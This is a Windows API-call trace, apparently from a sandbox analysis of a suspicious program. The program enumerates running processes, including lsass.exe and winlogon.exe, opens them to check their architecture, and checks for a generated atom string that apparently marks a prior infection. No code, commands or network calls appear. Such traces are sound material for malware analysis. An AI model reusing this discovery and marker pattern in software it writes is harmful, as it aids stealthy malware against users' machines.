	[0074.080] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.080] CloseHandle (hObject=0x224) returned 1
	[0074.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.080] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.080] CloseHandle (hObject=0x224) returned 1
	[0074.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.080] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.080] CloseHandle (hObject=0x224) returned 1
	[0074.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.080] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.080] CloseHandle (hObject=0x224) returned 1
	[0074.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.081] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.081] CloseHandle (hObject=0x224) returned 1
	[0074.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.081] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.081] CloseHandle (hObject=0x224) returned 1
	[0074.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.081] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.081] CloseHandle (hObject=0x224) returned 1
	[0074.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.081] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.081] CloseHandle (hObject=0x224) returned 1
	[0074.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.081] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.081] CloseHandle (hObject=0x224) returned 1
	[0074.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.082] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.082] CloseHandle (hObject=0x224) returned 1
	[0074.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea40, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.082] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.082] CloseHandle (hObject=0x224) returned 1
	[0074.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e720, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.082] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.082] CloseHandle (hObject=0x224) returned 1
	[0074.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.082] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetLastError () returned 0x5
	[0074.083] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.083] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.083] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.084] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.085] GetLastError () returned 0x5
	[0074.086] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.086] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.086] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.086] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.086] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.086] CloseHandle (hObject=0x224) returned 1
	[0074.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.086] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.086] CloseHandle (hObject=0x224) returned 1
	[0074.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eb58, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.087] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.087] CloseHandle (hObject=0x224) returned 1
	[0074.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0074.120] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0074.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dbb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.124] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.124] CloseHandle (hObject=0x224) returned 1
	[0074.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728a98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.124] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.124] CloseHandle (hObject=0x224) returned 1
	[0074.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728858, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.125] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.125] CloseHandle (hObject=0x224) returned 1
	[0074.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.125] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.125] CloseHandle (hObject=0x224) returned 1
	[0074.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.125] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.125] CloseHandle (hObject=0x224) returned 1
